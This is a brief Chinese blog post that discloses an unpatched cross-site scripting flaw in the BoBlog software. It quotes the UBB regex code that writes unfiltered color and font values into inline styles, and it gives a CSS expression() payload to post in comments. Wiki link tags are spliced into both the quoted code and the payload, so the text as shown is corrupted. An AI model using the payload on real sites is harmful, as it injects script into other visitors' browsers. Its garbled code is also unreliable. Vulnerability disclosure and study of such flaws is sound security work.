BoBlog跨站漏洞
今天抽空看了下Boblog的代码,发现了个跨站漏洞,影响最新版,目前官方没出补丁(呵呵,貌似偶有点不厚道), 看下ubb.[wiki]PHP[/wiki]的代码:
Copy code$regubb_[wiki]Search[/wiki] = array(
.......
"/\[color=([^\[\<]+?)\](.+?)\[\/color\]/i",
"/\[font=([^\[\<]+?)\](.+?)\[\/font\]/i",
.......
);
$regubb_replace = array(
.......
"<span style=\"color: \\2\\1;\">\\2</span>",
"<span style=\"font-family: \\2\\1;\">\\2</span>",
.......
);
$str=preg_replace($regubb_search, $regubb_replace, $str);
哈哈,没有对style里的东东过滤,在评论或留言处写:
Copy code[color=e[wiki]XP[/wiki]ression(alert())]lib3rt3
至于跨站的具体利用,我想大家都比我明白:)
